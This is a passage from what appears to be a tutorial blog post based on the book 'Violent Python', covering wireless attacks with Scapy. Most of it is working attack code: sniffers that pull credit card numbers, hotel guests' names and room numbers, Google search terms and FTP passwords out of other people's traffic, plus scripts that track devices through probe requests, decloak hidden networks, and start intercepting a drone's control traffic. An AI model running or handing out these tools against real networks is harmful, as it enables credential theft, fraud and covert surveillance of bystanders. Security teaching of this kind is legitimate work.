        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected 802.11 Beacon Frame"</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11ProbeReq</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected 802.11 Probe Request Frame"</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">TCP</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected a TCP Packet"</span><span class="p">)</span>
    <span class="k">elif</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">DNS</span><span class="p">):</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected a DNS Packet"</span><span class="p">)</span>
        
<span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">sniff</span><span class="p">(</span><span class="n">prn</span><span class="o">=</span><span class="n">pkt_print</span><span class="p">)</span>
</code></pre></div></div>

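<h3 id="安装-python-蓝牙包">Installing the Python Bluetooth Packages</h3>

<p>This section uses the Python bindings for the Linux BlueZ application programming interface (API) together with the obexftp API. (ObexFTP is an FTP client built on the OBEX protocol; OBEX stands for Object Exchange.)</p>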

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># sudo apt-get install python-bluez bluetooth python-obexftp</span>
</code></pre></div></div>

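<p>A Bluetooth device is also required. Most Bluetooth devices built on chipsets from Cambridge Silicon Radio (CSR) work properly under Linux. The <code class="language-plaintext highlighter-rouge">hciconfig config</code> command prints the device's detailed configuration to the screen.</p>

<p>Backtrack 5 r1 has a small flaw: its precompiled kernel lacks the kernel modules needed to send raw data-link-layer Bluetooth packets. You therefore need to upgrade the kernel or use Backtrack 5 r2.</p>

<h2 id="绵羊墙-被动窃听无线网络中传输的秘密">The Wall of Sheep: Passively Listening to Secrets Sent over Wireless Networks</h2>

<h3 id="使用-python-正则表达式嗅探信用卡信息">Sniffing Credit Card Information with Python Regular Expressions</h3>

<p>This section covers the three most widely used credit cards: Visa, MasterCard, and American Express. Regular expressions for card numbers from other issuers are listed at <code class="language-plaintext highlighter-rouge">http://www.regular-expressions.info/creditcard.html</code>.</p>

<p>American Express card numbers are 15 digits long and begin with 34 or 37.</p>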

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span>
<span class="k">def</span> <span class="nf">find_credit_card</span><span class="p">(</span><span class="n">raw</span><span class="p">):</span>
    <span class="n">america_re</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"3[47][0-9]{13}"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">america_re</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found American Express Card: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">america_re</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
        
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">tests</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="n">tests</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="s">"I would like to buy 1337 copies of that dvd"</span><span class="p">)</span>
    <span class="n">tests</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="s">"Bill my card: 378282246310005 for $2600"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">test</span> <span class="ow">in</span> <span class="n">tests</span><span class="p">:</span>
        <span class="n">find_credit_card</span><span class="p">(</span><span class="n">test</span><span class="p">)</span>

<span class="n">main</span><span class="p">()</span>
</code></pre></div></div>

<p>Regular expressions for MasterCard and Visa card numbers can be written in the same way.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">find_credit_card</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
    <span class="n">america_re</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"3[47][0-9]{13}"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="n">master_re</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"5[1-5][0-9]{14}"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="n">visa_re</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"4[0-9]{12}(?:[0-9]{3})?"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">america_re</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found American Express Card: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">america_re</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
    <span class="k">if</span> <span class="n">master_re</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found MasterCard Card: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">master_re</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
    <span class="k">if</span> <span class="n">visa_re</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found Visa Card: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">visa_re</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
</code></pre></div></div>
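
<p>The regular expressions above match any run of digits with the right prefix and length, so ordinary numbers can produce false positives. The following is a minimal sketch, assuming the card numbers follow the standard Luhn checksum; <code class="language-plaintext highlighter-rouge">luhn_valid</code> is a hypothetical helper name and is not part of the original script.</p>

```python
def luhn_valid(number: str) -> bool:
    """Return True if the digits in `number` pass the Luhn checksum."""
    digits = [int(ch) for ch in number if ch.isdigit()]
    if not digits:
        return False
    total = 0
    # Walk from the rightmost digit and double every second digit.
    for index, digit in enumerate(reversed(digits)):
        if index % 2 == 1:
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0


# The American Express test number used in the example above.
print(luhn_valid("378282246310005"))
```

<p>One way to use it would be to report a regular-expression match only when <code class="language-plaintext highlighter-rouge">luhn_valid</code> also returns <code class="language-plaintext highlighter-rouge">True</code> for it.</p>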

<h3 id="嗅探宾馆住客">Sniffing Hotel Guests</h3>

<p>Python can be used to capture information about other guests staying in a hotel.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="k">try</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] Starting Hotel Guest Sniffer."</span><span class="p">)</span>
    <span class="n">sniff</span><span class="p">(</span><span class="nb">filter</span><span class="o">=</span><span class="s">"tcp"</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">find_guest</span><span class="p">,</span> <span class="n">store</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
<span class="k">except</span> <span class="nb">KeyboardInterrupt</span><span class="p">:</span>
    <span class="nb">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>

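<p>Next, build a regular expression that matches every string beginning with <code class="language-plaintext highlighter-rouge">LAST_NAME</code> and ending with <code class="language-plaintext highlighter-rouge">&amp;</code> to capture the guest's last name. A similar expression captures the guest's room number.</p>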

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">find_guest</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
    <span class="n">name</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"(?i)Last_NAME=(.*)&amp;"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="n">room</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"(?i)ROOM_NUMBER=(.*)'"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">name</span> <span class="ow">and</span> <span class="n">room</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Found Hotel Guest {}, Room #{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">name</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">room</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
</code></pre></div></div>

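<h3 id="编写谷歌键盘记录器">Writing a Google Keylogger</h3>

<p>As each character is typed into the search bar, the browser sends an HTTP GET to Google almost every time.</p>

<p>The parameters in a Google search URL carry a great deal of additional information, which is quite useful when writing a Google keylogger.</p>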

<table>
  <thead>
    <tr>
      <th>Parameter</th>
      <th>Meaning</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td>q=</td>
      <td>The query, i.e. what was typed into the search box</td>
    </tr>
    <tr>
      <td>pq=</td>
      <td>The previous query, i.e. the search made just before this one</td>
    </tr>
    <tr>
      <td>hl=</td>
      <td>Language; the default is en, and <code class="language-plaintext highlighter-rouge">xx-hacker</code> is worth a try</td>
    </tr>
    <tr>
      <td>as_epq=</td>
      <td>Exact phrase (query precision)</td>
    </tr>
    <tr>
      <td>as_filetype=</td>
      <td>File format, used to search for a specific file type such as <code class="language-plaintext highlighter-rouge">.zip</code></td>
    </tr>
    <tr>
      <td>as_sitesearch=</td>
      <td>Restricts the search to a specific site</td>
    </tr>
  </tbody>
</table>
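
<p>To see how these parameters sit in a URL, the sketch below builds a sample search URL and splits it back into its parameters using the standard library's <code class="language-plaintext highlighter-rouge">urllib.parse</code>. The URL, the parameter values, and the helper name <code class="language-plaintext highlighter-rouge">google_params</code> are made up for illustration and are not taken from captured traffic.</p>

```python
from urllib.parse import parse_qs, urlencode, urlsplit


def google_params(url: str) -> dict:
    """Return the first value of each query parameter in `url`."""
    query = urlsplit(url).query
    # parse_qs decodes '+' and percent-escapes such as %20.
    return {key: values[0] for key, values in parse_qs(query).items()}


# Hypothetical sample URL assembled from the parameters in the table.
sample = "http://www.google.com/search?" + urlencode(
    {"hl": "en", "pq": "violent", "q": "violent python", "as_filetype": "pdf"}
)
params = google_params(sample)
print(params["q"])
print(params["pq"])
```

<p>Letting <code class="language-plaintext highlighter-rouge">parse_qs</code> do the decoding avoids hand-written replacements for <code class="language-plaintext highlighter-rouge">+</code> and <code class="language-plaintext highlighter-rouge">%20</code>.</p>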

<p>The captured search data can be displayed in real time.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">find_google</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Raw</span><span class="p">):</span>
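        <span class="n">payload</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Raw</span><span class="p">).</span><span class="n">load</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="s">"utf-8"</span><span class="p">,</span> <span class="n">errors</span><span class="o">=</span><span class="s">"ignore"</span><span class="p">)</span>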
        <span class="k">if</span> <span class="s">"GET"</span> <span class="ow">in</span> <span class="n">payload</span><span class="p">:</span>
            <span class="k">if</span> <span class="s">"google"</span> <span class="ow">in</span> <span class="n">payload</span><span class="p">:</span>
                <span class="n">r</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">r</span><span class="s">"(?i)\&amp;q=(.*?)\&amp;"</span><span class="p">,</span> <span class="n">payload</span><span class="p">)</span>
                <span class="k">if</span> <span class="n">r</span><span class="p">:</span>
                    <span class="n">search</span> <span class="o">=</span> <span class="n">r</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">"&amp;"</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
                    <span class="n">search</span> <span class="o">=</span> <span class="n">search</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">"q="</span><span class="p">,</span> <span class="s">""</span><span class="p">).</span><span class="n">replace</span><span class="p">(</span><span class="s">"+"</span><span class="p">,</span> <span class="s">" "</span><span class="p">).</span><span class="n">replace</span><span class="p">(</span><span class="s">"%20"</span><span class="p">,</span> <span class="s">" "</span><span class="p">)</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Searched For: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">search</span><span class="p">))</span>
</code></pre></div></div>

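<p>Start sniffing with <code class="language-plaintext highlighter-rouge">sniff</code>: <code class="language-plaintext highlighter-rouge">sniff(filter="tcp port 80", prn=find_google)</code></p>

<h3 id="嗅探-ftp-登陆口令">Sniffing FTP Login Credentials</h3>

<p>The File Transfer Protocol (FTP) does not encrypt the user's login password. The script below finds the credentials with regular expressions and also extracts the destination IP address from the packet.</p>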

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span>
<span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">def</span> <span class="nf">ftp_sniff</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="n">dest</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">dst</span>
    <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
    <span class="n">user</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"(?i)USER (.*)"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="n">pswd</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="s">"(?i)PASS (.*)"</span><span class="p">,</span> <span class="n">raw</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">user</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] Detected FTP Login to {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">dest</span><span class="p">))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] User account: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">user</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
    <span class="k">elif</span> <span class="n">pswd</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Password: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">pswd</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
</code></pre></div></div>

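<p>Run it with <code class="language-plaintext highlighter-rouge">sniff(filter="tcp port 21", prn=ftp_sniff)</code>.</p>

<h2 id="你带着笔记本电脑去过哪里python-告诉你">Where Has Your Laptop Been? Python Can Tell You</h2>

<h3 id="侦听-80211-probe-请求">Listening for 802.11 Probe Requests</h3>

<p>To provide a seamless connection, your computer and phone usually keep a preferred network list containing the names of networks you have successfully joined before. When the computer boots or drops off a network, it sends 802.11 probe requests to search for each network on that list.</p>

<p>The following tool detects 802.11 probe requests.</p>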

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">interface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">probe_reqs</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">def</span> <span class="nf">sniff_probe</span><span class="p">(</span><span class="n">p</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">p</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11ProbeReq</span><span class="p">):</span>
        <span class="n">net_name</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11ProbeReq</span><span class="p">).</span><span class="n">info</span>
        <span class="k">if</span> <span class="n">net_name</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">probe_reqs</span><span class="p">:</span>
            <span class="n">probe_reqs</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">net_name</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Detected New Probe Request: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">net_name</span><span class="p">))</span>
<span class="n">sniff</span><span class="p">(</span><span class="n">iface</span><span class="o">=</span><span class="n">interface</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">sniff_probe</span><span class="p">)</span>
</code></pre></div></div>

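<h3 id="寻找隐藏的-80211-信标">Finding Hidden 802.11 Beacons</h3>

<p>Although most networks publicly broadcast their network name (SSID), some wireless networks use a hidden SSID to keep the name from being discovered. The info field of an 802.11 beacon frame normally contains the network name. In a hidden network the access point leaves this field unfilled, so finding hidden networks is straightforward: look for 802.11 beacon frames whose info field is blank.</p>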

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">sniff_dot11</span><span class="p">(</span><span class="n">p</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">p</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11Beacon</span><span class="p">):</span>
        <span class="k">if</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11Beacon</span><span class="p">).</span><span class="n">info</span> <span class="ow">in</span> <span class="p">(</span><span class="s">""</span><span class="p">,</span> <span class="sa">b</span><span class="s">""</span><span class="p">):</span>
            <span class="n">addr2</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11</span><span class="p">).</span><span class="n">addr2</span>
            <span class="k">if</span> <span class="n">addr2</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">hidden_nets</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[-] Detected Hidden SSID: with MAC: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">addr2</span><span class="p">))</span>
                <span class="n">hidden_nets</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">addr2</span><span class="p">)</span>
</code></pre></div></div>
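
<p>Under Python 3, recent Scapy versions generally return the info field as <code class="language-plaintext highlighter-rouge">bytes</code>, and some access points are known to hide the SSID by filling the field with null bytes instead of leaving it empty. The sketch below shows one way to treat both cases as blank. It assumes the field arrives as <code class="language-plaintext highlighter-rouge">bytes</code> or <code class="language-plaintext highlighter-rouge">str</code>, and <code class="language-plaintext highlighter-rouge">is_hidden_ssid</code> is a hypothetical helper name that does not appear in the original code.</p>

```python
def is_hidden_ssid(info) -> bool:
    """Return True when an SSID field is empty or contains only null bytes."""
    if isinstance(info, str):
        # Normalize text input so both types follow the same path.
        info = info.encode("utf-8")
    return len(info.strip(b"\x00")) == 0


# Sample values standing in for the info field of captured beacon frames.
for sample in (b"", b"\x00\x00\x00\x00", b"HomeNet"):
    print(sample, is_hidden_ssid(sample))
```

<p>Such a helper could stand in for the direct comparison against an empty string in the beacon check.</p>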

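<h3 id="找出隐藏的-80211-网络的网络名">Recovering the Name of a Hidden 802.11 Network</h3>

<p>Although the access point leaves the info field of its 802.11 beacon frames blank, it still has to transmit the network name in its probe response frames. The script therefore waits for a probe response frame whose MAC address matches that of the 802.11 beacon frame.</p>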

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">interface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">hidden_nets</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">unhidden_nets</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">def</span> <span class="nf">sniff_dot11</span><span class="p">(</span><span class="n">p</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">p</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11ProbeResp</span><span class="p">):</span>
        <span class="n">addr2</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11</span><span class="p">).</span><span class="n">addr2</span>
        <span class="k">if</span> <span class="n">addr2</span> <span class="ow">in</span> <span class="n">hidden_nets</span> <span class="ow">and</span> <span class="n">addr2</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">unhidden_nets</span><span class="p">:</span>
            <span class="n">net_name</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11ProbeResp</span><span class="p">).</span><span class="n">info</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Decloaked Hidden SSID: {} for MAC: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">net_name</span><span class="p">,</span> <span class="n">addr2</span><span class="p">))</span>
            <span class="n">unhidden_nets</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">addr2</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">p</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">Dot11Beacon</span><span class="p">):</span>
        <span class="k">if</span> <span class="ow">not</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11Beacon</span><span class="p">).</span><span class="n">info</span><span class="p">:</span>
            <span class="n">addr2</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">Dot11</span><span class="p">).</span><span class="n">addr2</span>
            <span class="k">if</span> <span class="n">addr2</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">hidden_nets</span><span class="p">:</span>
                <span class="k">print</span><span class="p">(</span><span class="s">"[-] Detected Hidden SSID: with MAC: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">addr2</span><span class="p">))</span>
                <span class="n">hidden_nets</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">addr2</span><span class="p">)</span>
<span class="n">sniff</span><span class="p">(</span><span class="n">iface</span><span class="o">=</span><span class="n">interface</span><span class="p">,</span> <span class="n">prn</span><span class="o">=</span><span class="n">sniff_dot11</span><span class="p">)</span>
</code></pre></div></div>
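<p>The bookkeeping in the script above can be looked at separately from packet capture. The following is a minimal sketch under stated assumptions: frames are modelled as plain <code class="language-plaintext highlighter-rouge">(frame_type, mac, ssid)</code> tuples rather than Scapy packets, and the function name <code class="language-plaintext highlighter-rouge">decloak</code> and the type labels are hypothetical, chosen only for illustration.</p>

```python
# Sketch only: frames are modelled as plain tuples, not Scapy packets.
# Each tuple is (frame_type, mac, ssid); the type labels are hypothetical.

def decloak(frames):
    """Return a dict mapping each hidden access point's MAC to its recovered SSID."""
    hidden = set()   # MACs seen beaconing with an empty SSID
    names = {}       # MAC to SSID, filled in from probe responses
    for frame_type, mac, ssid in frames:
        if frame_type == "beacon" and not ssid:
            hidden.add(mac)
        elif frame_type == "probe_resp" and mac in hidden and mac not in names:
            names[mac] = ssid
    return names


frames = [
    ("beacon", "00:11:22:33:44:55", ""),         # hidden network
    ("beacon", "66:77:88:99:aa:bb", "cafe"),      # visible network, ignored
    ("probe_resp", "00:11:22:33:44:55", "lab"),   # reveals the hidden name
    ("probe_resp", "00:11:22:33:44:55", "lab"),   # duplicate, ignored
]
print(decloak(frames))
```

<p>A set and a dict are used here instead of the two lists in the script, so membership checks stay cheap when many access points are in range. The logic is otherwise the same: a probe response only counts once its MAC has been seen in a beacon with a blank name.</p>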

<h2 id="用-python-截取和监视无人机">Intercepting and Monitoring a Drone with Python</h2>

<h3 id="截取数据包解析协议">Capturing Packets and Dissecting the Protocol</h3>

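<p>The drone and the iPhone set up an <code class="language-plaintext highlighter-rouge">ad-hoc</code> wireless network (a peer-to-peer link: ad-hoc mode is conceptually like the old direct cable connection between two machines, so it cannot communicate with other networks). MAC address binding turns out to be the only security mechanism protecting the connection: only the paired iPhone can send flight-control commands to the drone.</p>

<p>First, put the adapter into monitor mode to listen to the traffic. The drone sends UDP traffic to UDP port 5555 on the phone, which carries the video stream, while flight-control commands travel over port 5556.</p>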

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># airmon-ng start wlan0</span>
<span class="c"># tcpdump -nn -i mon0</span>
</code></pre></div></div>

<p>Knowing that the iPhone sends flight-control commands to the drone over UDP port 5556, we can write a Python script that extracts the flight-control traffic:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">NAVPORT</span> <span class="o">=</span> <span class="mi">5556</span>
<span class="k">def</span> <span class="nf">print_pkt</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">UDP</span><span class="p">)</span> <span class="ow">and</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">UDP</span><span class="p">).</span><span class="n">dport</span> <span class="o">==</span> <span class="n">NAVPORT</span><span class="p">:</span>
        <span class="n">raw</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">sprintf</span><span class="p">(</span><span class="s">"%Raw.load%"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="n">raw</span><span class="p">)</span>
<span class="n">conf</span><span class="p">.</span><span class="n">iface</span> <span class="o">=</span> <span class="s">"mon0"</span>
<span class="n">sniff</span><span class="p">(</span><span class="n">prn</span><span class="o">=</span><span class="n">print_pkt</span><span class="p">)</span>
</code></pre></div></div>

<p>Analysis of the captured traffic shows that the protocol uses statements of the form <code class="language-plaintext highlighter-rouge">AT*CMD=SEQUENCE_NUMBER,VALUE,[VALUE{3}]</code>.</p>
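<p>To make the syntax concrete, here is a minimal sketch of a parser for one such statement. The function name <code class="language-plaintext highlighter-rouge">parse_at_command</code> is hypothetical, and the sketch assumes only what the syntax states: a command name after <code class="language-plaintext highlighter-rouge">AT*</code>, then a sequence number, then zero or more comma-separated values.</p>

```python
def parse_at_command(raw):
    """Split 'AT*CMD=SEQ,VALUE,...' into (command, sequence number, values)."""
    line = raw.strip()
    if not line.startswith("AT*") or "=" not in line:
        raise ValueError("not an AT command: {!r}".format(raw))
    name, _, args = line[3:].partition("=")
    fields = args.split(",")
    seq = int(fields[0])       # the first field is the sequence number
    return name, seq, fields[1:]


print(parse_at_command("AT*REF=42,290718208\r"))
```

<p>The values are left as strings on purpose, since the syntax alone does not say how each command interprets them.</p>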

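<p>Next, write an <code class="language-plaintext highlighter-rouge">interceptThread</code> class that stores the information gathered during the attack: the most recently captured packet, the sequence number of the drone protocol, and a Boolean indicating whether the drone's traffic has been intercepted.</p>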

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">threading</span>
<span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="k">class</span> <span class="nc">interceptThread</span><span class="p">(</span><span class="n">threading</span><span class="p">.</span><span class="n">Thread</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="n">threading</span><span class="p">.</span><span class="n">Thread</span><span class="p">.</span><span class="n">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">)</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span> <span class="o">=</span> <span class="bp">None</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">seq</span> <span class="o">=</span> <span class="mi">0</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">found_uav</span> <span class="o">=</span> <span class="bp">False</span>
    <span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
        <span class="n">sniff</span><span class="p">(</span><span class="n">prn</span><span class="o">=</span><span class="bp">self</span><span class="p">.</span><span class="n">intercept_pkt</span><span class="p">,</span> <span class="nb">filter</span><span class="o">=</span><span class="s">"udp port 5556"</span><span class="p">)</span>
    <span class="k">def</span> <span class="nf">intercept_pkt</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">pkt</span><span class="p">):</span>
        <span class="k">if</span> <span class="ow">not</span> <span class="bp">self</span><span class="p">.</span><span class="n">found_uav</span><span class="p">:</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] UAV Found."</span><span class="p">)</span>
            <span class="bp">self</span><span class="p">.</span><span class="n">found_uav</span> <span class="o">=</span> <span class="bp">True</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">cur_pkt</span> <span class="o">=</span> <span class="n">pkt</span>
